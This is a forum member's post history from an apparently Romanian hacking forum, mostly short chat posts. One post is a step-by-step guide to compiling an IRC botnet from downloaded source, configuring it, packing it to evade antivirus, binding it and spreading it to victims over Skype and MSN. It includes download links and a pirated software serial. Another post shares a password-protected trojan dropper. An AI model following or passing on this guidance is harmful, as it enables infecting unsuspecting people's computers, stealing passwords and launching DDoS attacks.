Jump to content

MasterCode

Members
  • Posts

    12
  • Joined

  • Last visited

Everything posted by MasterCode

  1. Password is: Romanian Security Team File is infected, the *.exe file name is justched.exe ! AntiVir TR/Dropper.Gen 20130513 eSafe Win32.TrojanHorse 20130513 Ikarus Trojan-Dropper 20130513
  2. I'll Still here This forum is one of my favourite!
  3. One BG stupid joke (glum?): one horse entered in a bar and say: And what I'm just a horse?.. and escaped through the fan. xD
  4. I write all web attacks that I know http://rapidshare.com/files/203925041/WebAttacks.html
  5. I know GML (Game Maker Language), php, sql, JavaScript, Ajax, perl a little as one continues to learn. Otherwise, I am Web designer
  6. Hello, this is guide how to create BotNet. This explanation will show you how to compile botnet and how it set, and will also give you the software that can hiding it from each antivirus software. Nowadays there are many types bots.GT, RX ... and more. What is a botnet? Botnet is a virus, worm, Trojan, which infected most of the machines Windows OS, as zombies them without their experience and enter into certain IRC servers in a channel. Master bot, which makes the virus can manage it with 1 command. They can steal passwords.Botnet main weapon is DDoS. May open up sites to steal serial numbers.Imagine your computer to 1000 watts DDoS-1 server? You need Visual C + +: http://www.microsoft.com/downloads/details...;displaylang=en Also SDK: http://bgcrackerbg.data.bg/botnet%20tools/sdk.exe And msc: http://rs50.rapidshare.com/files/21861555/msc__.rar ------- Pass: itzforblitz Serial: 812-2224558 ------- This is the sourse codes: http://rapidshare.com/files/203917351/BotNet_By_Zipo_.rar.html Bots consists of many files.All should be compiled in a *.exe. Install all programs. 1.Set your Visual C + + compiler 2.Go in Tools> Options and tick of Directories 3.Now search these directories by the SDK-and insert them C: \ PROGRAM FILES \ Mcft PLATFORM SDK C: \ PROGRAM FILES \ Mcft PLATFORM SDK \ BIN C: \ PROGRAM FILES \ Mcft PLATFORM SDK \ INCLUDE C: \ PROGRAM FILES \ MICROSOFRT PLATFORM SDK \ LIB 5.Configurateing of bot: Bot be configured from the file config.h in source code you gave. Set it where to come "zombies", and backup your files. 6.Creating your bot Open Visual Studio, click File> Open Workspace Find your bot folder and open the file with the extension *.dsw give Build: Give Build and waiting for it to compile and you're ready. Open the bot folder and somewhere there are your *.exe file in the Debug folder. 7.After send to someone an idiot, you must protect it, because almost each AV's catch it.There is a packegers: http://rapidshare.com/files/203921757/Pack.rar.html Best be packaged with Enigma Here's how blind it with a Binding.exe Here's how it will reduce its size for more speed in sending and cover: Distribution on skype and msn: Use Sprinder.exe Commands from here: http://rapidshare.com/files/203922781/cmands.html Even if you took tons can not prove it is yours if you are caught logging into servers. Everything is instructional Does not assume any responsibility to this information Zipo™ Still PwNz
  7. @v1c right, i know I have interesting things to show you like how to create BotNet zombie network :}
  8. Salut, sunt nou pe aici ... eu sunt din Bulgaria si se agita ca, atunci când nu exist? nici o bun?-ne h4x forum.Iskam s? spun c? totul este bine f?cut ?i nu idioti:) nu ?tiu limba român?, dar mi-ar fi pentru a afla despre acest forum: P În prezent, pot utiliza Google Transletor haha .. ~ Zipo ™
×
×
  • Create New...